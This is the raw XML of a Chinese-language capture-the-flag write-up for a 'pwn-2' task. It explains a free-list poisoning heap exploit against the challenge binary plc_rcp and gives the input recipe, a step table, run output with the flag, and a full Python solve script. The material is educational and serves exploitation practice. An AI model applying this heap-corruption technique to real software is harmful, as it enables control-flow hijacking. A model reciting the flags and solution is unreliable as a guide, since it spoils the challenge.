        <w:t>diag      flag{H34p_D1ag_M0d3_N0t_4_Fl4g}</w:t>
        <w:br/>
        <w:t>selftest  flag{C4ch3_S3lf_T3st_Only_D3c0}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">其中只有 audit 与 policy 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>status=valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应，另外两条是诱饵。静态解密仅用于确认目标与验证答案，正式利用仍走动态链路。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>六、free-list poisoning 利用链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">堆块步长 0x28，块头 8 字节，因此用户区地址 = 块头 + 8。跳转表 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x402000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 附近可用的两个落点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>块头 0x401ff8 -&gt; 用户区 0x402000   连续 32 字节，覆盖 render 与 export 两项</w:t>
        <w:br/>
        <w:t>块头 0x402000 -&gt; 用户区 0x402008   只覆盖 export 一项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401ff8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(addr - 8 - 0x4040a0) % 0x28 == 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，属于合法块框，因此把某个已释放块的 next 改写为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401ff8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，下一次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会原样返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x402000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 xml:space="preserve">利用脚本 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>solve.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>alloc 0</w:t>
        <w:br/>
        <w:t>free 0</w:t>
        <w:br/>
        <w:t>write 0 0020400000000000</w:t>
        <w:br/>
        <w:t>alloc 1</w:t>
        <w:br/>
        <w:t>alloc 2</w:t>
        <w:br/>
        <w:t>write 2 1012400000000000</w:t>
        <w:br/>
        <w:t>render 0</w:t>
        <w:br/>
        <w:t>quit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>逐步对应：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8"/>
        <w:gridCol w:w="5712"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="1"/>
        </w:trPr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before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
              </w:rPr>
              <w:t>步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
              </w:rPr>
              <w:t>作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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alloc 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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bump 递交首块，slot[0] 非空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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free 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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块入空闲链表，slot[0] 指针保留</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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write 0 0020400000000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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借已释放帧改写 next = 0x402000（小端）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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alloc 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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弹出该块，返回 0x402000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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alloc 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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 xml:space="preserve">链表已空，按 </w:t>
            </w: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0x402000 + 0x20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 与堆顶判界，仍走 bump 分支，返回 0x4040a0（slot 数组起点）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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write 2 1012400000000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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向 slot[2] 写入 0x401210（audit 入口）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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render 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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 xml:space="preserve">slot[0] 非空，调用 </w:t>
            </w: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[0x402000]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
              </w:rPr>
              <w:t>，此时已被改写为 audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入的是 8 字节小端地址 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>00 20 40 00 00 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（即 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x402000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>write 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x401210</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，与跳转表项宽度一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>七、验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>WSL Ubuntu 下执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>$ ./plc_rcp &lt; solve.txt</w:t>
        <w:br/>
        <w:t>allocated</w:t>
        <w:br/>
        <w:t>freed</w:t>
        <w:br/>
        <w:t>written</w:t>
        <w:br/>
        <w:t>allocated</w:t>
        <w:br/>
        <w:t>allocated</w:t>
        <w:br/>
        <w:t>written</w:t>
        <w:br/>
        <w:t>audit backend (reserved)</w:t>
        <w:br/>
        <w:t>flag{Fr33l1st_P01s0n_2026_Heap}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>八、完整解题脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
        <w:br/>
        <w:t>import re</w:t>
        <w:br/>
        <w:t>import subprocess</w:t>
        <w:br/>
        <w:t>import sys</w:t>
        <w:br/>
        <w:br/>
        <w:t>BIN = './plc_rcp'</w:t>
        <w:br/>
        <w:br/>
        <w:t>RECIPE = b'''</w:t>
        <w:br/>
        <w:t>alloc 0</w:t>
        <w:br/>
        <w:t>free 0</w:t>
        <w:br/>
        <w:t>write 0 0020400000000000</w:t>
        <w:br/>
        <w:t>alloc 1</w:t>
        <w:br/>
        <w:t>alloc 2</w:t>
        <w:br/>
        <w:t>write 2 1012400000000000</w:t>
        <w:br/>
        <w:t>render 0</w:t>
        <w:br/>
        <w:t>quit</w:t>
        <w:br/>
        <w:t>'''</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>def main():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not os.path.exists(BIN):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sys.exit('[-] plc_rcp not found, run this script in the task directory')</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    proc = subprocess.run([BIN], input=RECIPE.lstrip(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    out = proc.stdout.decode('utf-8', errors='replace')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print(out, end='')</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    m = re.search(r'flag\{[^}]*\}', out)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not m:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sys.exit('[-] flag not found')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print('FLAG:', m.group(0))</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    main()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22780"/>
            <wp:docPr id="3" name="Picture 3" descr="image-2026101717093348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709334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2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运行结果如下，flag为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>flag{Fr33l1st_P01s0n_2026_Heap}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Hyphenat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keepLines w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="160"/>
      <w:wordWrap w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei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任务18 pwn-2 writeup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